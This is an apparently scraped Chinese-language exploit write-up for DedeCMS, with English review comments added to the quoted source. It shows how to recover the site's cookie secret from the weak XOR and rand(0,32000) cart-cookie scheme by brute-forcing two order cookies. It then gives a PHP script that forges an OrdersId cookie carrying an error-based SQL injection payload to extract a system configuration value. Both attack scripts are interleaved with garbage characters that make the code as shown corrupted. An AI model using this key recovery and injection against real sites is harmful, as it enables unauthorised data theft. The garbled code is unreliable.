www.xxx.com/plus/search.php?keyword=. `1 i9 `' j" a( }( ~% U
在 include/shopcar.class.php 中,
先看一下这个shopcar类是如何生成cookie的
// DedeCMS include/shopcar.class.php: writes $value to the client as cookie $key
// after passing it through enCrypt().
// $key   - cookie name.
// $value - array (first flattened by enCode(), which per the post yields a
//          query-string-like "a=yy&b=cc" form) or a plain scalar.
// Security note (review): the protection applied here is only the XOR
// obfuscation in enCrypt()/setKey(); there is no integrity tag, and setcookie()
// is called without the secure/httponly parameters. Any client that can recover
// the site key can therefore present an arbitrary cart/order cookie.
function saveCookie($key,$value)
{
    if(is_array($value))
    {
        $value = $this->enCrypt($this->enCode($value));
    }
    else
    {
        $value = $this->enCrypt($value);
    }
    // 36000 s (10 h) lifetime, site-wide path; domain/secure/httponly not set.
    setcookie($key,$value,time()+36000,'/');
}
简单地说,$key就是cookie的key,$value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的形式,关键是enCrypt函数
// Obfuscates $txt with a per-call random key, passes the result through
// setKey() (XOR with the site secret) and base64-encodes it.
// Weakness visible in this function: the key is md5(rand(0, 32000)) - at most
// 32001 distinct values - and every output byte is written next to the key
// character it was XORed with, so this layer adds no real secrecy; the only
// secret in the whole construction is the one used by setKey(). srand()/rand()
// are not cryptographic generators. A sound design would use random_bytes()
// and an authenticated construction (e.g. an HMAC over the cookie payload)
// rather than a repeating-key XOR.
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $encrypt_key = md5(rand(0, 32000));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index after the 32 hex characters of the md5
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        // key character is emitted in the clear alongside the XORed byte
        $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
    }
    return base64_encode($this->setKey($tmp));
}
// XORs $txt byte-by-byte with md5(strtolower($cfg_cookie_encode)) - the
// site-wide cookie secret - repeating the 32-character key.
// Note (review): a repeating-key XOR gives no integrity protection, and because
// enCrypt() exposes its own key characters, the input to this function can be
// reconstructed from known plaintext, which in turn exposes $encrypt_key. The
// secret should never be used as a bare XOR pad; derive a MAC from it instead.
function setKey($txt)
{
    global $cfg_cookie_encode;
    $encrypt_key = md5(strtolower($cfg_cookie_encode));
    $ctr = 0;
    $tmp = '';
    for($i = 0; $i < strlen($txt); $i++)
    {
        // wrap the key index after 32 characters
        $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
        $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
    }
    return $tmp;
}
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再重新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
具体代码如下:
2 ?0 M/ O& p4 l<?php3 k$ c" ~! e: n' Y9 G
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
7 X0 T; q8 ~8 o- [4 I8 ^& x. {: \$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here: Y/ d. a, a8 N) \# f
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
1 E* e( L% z* I6 C% a9 m& kfunction reStrCode($code,$string)8 f, j; N; t0 m; I6 H
{
c; G9 g+ a8 x* X1 u# x; \5 V5 C: W$code = base64_decode($code);# l0 l! C7 R3 T$ K( f' l
$key = “”;
/ V' O+ _/ z! B- O$ T# v: ofor($i=0 ; $i<32 ; $i++)
- j. M1 w: C3 r; _1 F6 p$ L{, d5 x7 W9 e P5 F
$key .= $string[$i] ^ $code[$i];8 W4 `+ j! z6 v, G
}& s h! c; R' L+ Q" |! Z; u
return $key;
" @' x8 S" A2 v2 e}
8 N! B- q1 k. F( `function getKeys($cookie,$plantxt)$ x4 l) u/ D3 w- U
{
) Z+ G0 f9 i+ n+ ?& w9 g" O$tmp = $cookie;3 @7 ?. H0 Q/ @: e5 J# M. K
$results = array();
5 W: x1 ]% P$ d3 Ifor($j=0 ; $j < 32000; $j++)
( ?, l2 Z8 C: I1 u) D5 i{$ P7 k( e" h9 p8 r% T
( n! p3 W: W( b: f E1 C$txt = $plantxt;
5 ?0 b9 \- T1 v/ R7 P8 N$ctr = 0;
. ?4 Q6 R& [. s9 t6 b2 _: Q" h5 b) b$tmp = ”;7 g* z. k0 `+ U& i3 x' i& x& x
$encrypt_key = md5($j);
' v# }4 N- q' G/ e# I3 b$ jfor($i =0; $i < strlen($txt); $i ++)' D i' o& B, O2 L2 r/ v' i
{) s# g7 h% _9 v0 V( K
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
& G" N, _4 C4 d! v& L6 E7 \$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);! F( d/ A. a4 S) e3 S) B w& z
}
1 u4 y; Z: J4 l% q% I$string = $tmp;
4 Y8 g- ~% q& t% F3 z$code = $cookie;
* S8 w0 Q* O; J' h T6 N# R% C$result = reStrCode($code,$string);
' h" o. r6 _# O; v. B$ ^& Iif(eregi(‘^[a-z0-9]+$’,$result))7 \0 H" w$ C3 Y' u1 ~- G
{5 m4 g$ ^+ G1 @* {7 v
echo $result.”\n”;
2 P9 A3 @( k( d4 t$results[] = $result;' d5 t7 j D9 i3 z& W
}. \) c$ s1 ?& ]. Q: F c; D
}# f, Y# Y N: _( L
return $results;
+ [# S- {, B1 j}7 E8 w3 `7 D1 e0 _
$results1 = getKeys($cookie1,$plantxt);4 O3 l8 T2 N+ u9 A$ {, ~) F
$results2 = getKeys($cookie2,$plantxt);) [& L2 h5 n4 E I
print “\n——————–real key————————–\n”;# c9 x$ `. u+ O6 |) C
foreach($results1 as $test1)
3 \- _) g3 V, f; U+ K{
, |; h8 n3 x3 p9 L3 ~foreach($results2 as $test2)4 K, N3 M. T8 w1 n! _+ G2 k, b
{
8 l' Q# O1 V$ ]4 dif($test1 == $test2)6 _& t) d5 D* O4 a9 y
{
8 ]5 Y, W: p9 E H- zecho $test1.”\n”;
! X7 G1 l4 |# c; h# W! R. ~. K; D}) f9 W, k! s0 x8 P: l( ]
}
% K0 X, S8 T+ a' W6 r}
+ s: v" [# I0 b6 E# L2 ??>; y1 ~4 p c3 a7 O3 _4 g2 j8 Q4 m
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个key之后,我们就可以构造任意购物车的cookie
接着看
20 class MemberShops1 z9 g7 K8 n% ]
21 {1 _) t, X" L' F: J _
    // Order id for the current visitor; populated in __construct() from the
    // "OrdersId" cookie (client-controlled input) or from MakeOrders().
    var $OrdersId;
    // Product id(s) of the cart; not assigned within this excerpt.
    var $productsId;
// Loads the order id from the "OrdersId" cookie and creates a new order when
// the cookie is empty.
// Security note (review): the id is taken from a client-supplied cookie and, as
// /plus/carbuyaction.php shows, later interpolated into SQL. getCookie()'s
// decoding must not be treated as validation: the value should be checked
// against the expected order-id format (and the query parameterised) before use.
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if(empty($this->OrdersId))
    {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现OrdersId是从cookie里面获取的
然后
/plus/carbuyaction.php中的
// /plus/carbuyaction.php (excerpt; the lines between the two statements are omitted in the post).
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id recorded for this request - read from the client cookie in MemberShops::__construct()
// ...
// $OrdersId is interpolated straight into the SQL string. Its value comes from a
// cookie whose obfuscation is recoverable (see enCrypt()/setKey() above), so this
// is an injection sink. Mitigation: bind it as a query parameter, or at minimum
// validate it against the expected order-id format before it reaches the query.
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1");
4 Q6 C% `) i/ k K接着我们就可以注入了
# | q+ C& W$ K通过利用下面代码生成cookie:7 {, ?3 |: t1 ~6 @
<?php
9 G) |% A' [* q8 m+ C" n3 O$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
! t+ h' c% r! {; D( c- E$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here) q O/ d* o3 a# `2 F8 E
function setKey($txt)
- D+ B4 O; V& U+ L0 O$ W6 d{' N3 }, d+ T! V- j- G. Z( _! j
global $encrypt_key;7 s' Q6 a3 a" u8 \$ m; u; T
$ctr = 0;
( \% O8 o% j+ z% C$tmp = ”;" g( G* c- Q( E+ _4 h+ h2 C0 u
for($i = 0; $i < strlen($txt); $i++)% C- a& j0 C/ W6 P4 {+ S- _# Z" N
{5 c3 U& |2 a! l C
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
5 c/ m. `2 L8 R+ {. U f3 D$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
0 ~& _3 a! I4 f n; @3 e2 |}
. m4 R9 j( P" m& treturn $tmp;
; f3 m F. C) C! z. y. I& W}; r4 o# B4 ]/ E* h
function enCrypt($txt)
3 K* v/ q; ?- \1 ]1 l. H{
, W# _ C! ^' |/ h( i6 dsrand((double)microtime() * 1000000);
+ g5 Q0 h4 V$ R1 `* N- p$encrypt_key = md5(rand(0, 32000));
: J5 n/ _2 Q5 m& r* ?3 H$ctr = 0;
8 J. Y+ `' g0 O& Y. z# v# ~$tmp = ”;
# c: L+ A4 x$ `+ Bfor($i = 0; $i < strlen($txt); $i++)2 F3 ` a$ h; K) B6 t5 X# T
{
6 t3 m* f- ]! n! Q& O V6 l f$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;% u8 c: \8 t$ A, }$ Q$ G$ J& C
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
* e0 _+ B; D" m( [}/ B8 H8 M$ G* H$ V: M3 f: w
return base64_encode(setKey($tmp));9 T$ i4 `4 ^# N# E1 i8 i4 e
}8 Y3 z0 w6 j* @, {2 b u. l
for($dest =0;$dest = enCrypt($txt);)
5 Q* l7 t% p0 D2 ~; U{
: r/ M& Y( d% C5 b L1 r' f* {if(!strpos($dest,’+'))
4 Q- Y5 A' P6 H% `# X2 m, \( l{
4 w+ |7 i: P/ o6 H' q6 Pbreak;5 F* s6 u' Y& O- s
}
+ w. Q3 ~/ m$ q4 b+ W}
: m$ z; h) _6 O2 k; |0 zecho $dest.”\n”;; ^' h$ q, ` x: K
?>
7 K7 W* H# o8 l
, Q5 t! o. {4 H |